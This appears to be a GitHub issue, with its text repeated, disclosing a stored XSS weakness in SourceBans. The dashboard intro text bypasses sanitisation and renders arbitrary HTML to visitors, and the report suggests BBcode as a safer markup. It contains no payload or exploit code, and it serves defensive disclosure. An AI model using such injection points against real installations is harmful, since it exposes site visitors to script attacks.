$dash_intro_text is initialised on init.php:28 from an untrusted $_GET source. This value is used only in pages/admin.settings.php:239.
This variable normally contains the markup text from the WYSIWYG editor in the SourceBans edit global settings dialogue. This value seems to deliberately subvert the FILTER_SANITIZE_STRING that takes place in init.php:33 to allow server operators to set their introduction text to have markup. Arbitrary HTML can be provided to this value which is then naively used to update the database with its contents, which are now rendered to each visitor of the SourceBans installation.
An issue like this would normally be considered low-impact, as the only ones who can change the MOTD text are the server owners themselves, and thus could generally modify the page to their wishes anyway. Unfortunately, as seen in #520, there are sometimes weaknesses that allow attackers to thus use this as an XSS avenue.
Sanitising arbitrary HTML is not an easy task, and may be worth visiting using BBcode as a markup in your WYSIWYG editor instead of HTML. You can then parse the BBcode to render the page, which would be a much safer alternative.
rumblefrog
commented
5 years ago
$dash_intro_text is initialised on
init.php:28from an untrusted $_GET source. This value is used only inpages/admin.settings.php:239.This variable normally contains the markup text from the WYSIWYG editor in the SourceBans edit global settings dialogue. This value seems to deliberately subvert the FILTER_SANITIZE_STRING that takes place in
init.php:33to allow server operators to set their introduction text to have markup. Arbitrary HTML can be provided to this value which is then naively used to update the database with its contents, which are now rendered to each visitor of the SourceBans installation.An issue like this would normally be considered low-impact, as the only ones who can change the MOTD text are the server owners themselves, and thus could generally modify the page to their wishes anyway. Unfortunately, as seen in #520, there are sometimes weaknesses that allow attackers to thus use this as an XSS avenue.
Sanitising arbitrary HTML is not an easy task, and may be worth visiting using BBcode as a markup in your WYSIWYG editor instead of HTML. You can then parse the BBcode to render the page, which would be a much safer alternative.